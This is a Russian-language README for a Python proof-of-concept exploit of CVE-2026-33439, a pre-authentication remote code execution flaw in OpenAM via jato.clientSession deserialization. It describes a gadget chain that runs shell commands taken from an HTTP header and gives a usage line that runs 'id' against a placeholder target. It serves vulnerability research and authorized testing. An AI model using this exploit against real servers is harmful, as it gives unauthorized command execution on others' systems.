
Python PoC для CVE-2026-33439 — RCE до аутентификации в OpenAM через десериализацию jato.clientSession
Автономный Python proof of concept для уязвимости удалённого выполнения кода до аутентификации в OpenAM при десериализации jato.clientSession.
Встроенный shaded-гаджет Click/Xalan читает shell-команду из HTTP-заголовка cmd и возвращает её вывод в HTTP-ответе. Внешние Python-пакеты, среда выполнения Java или JAR-файлы не требуются.
python3 exploit.py \
--url https://target.example/openam/ui/PWResetUserValidation \
'id'
Необязательные аргументы:
--timeout SECONDS Таймаут запроса (по умолчанию: 15)
--proxy URL HTTP-прокси, например http://127.0.0.1:8080
--verify-tls Включить проверку TLS-сертификата
Используйте только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.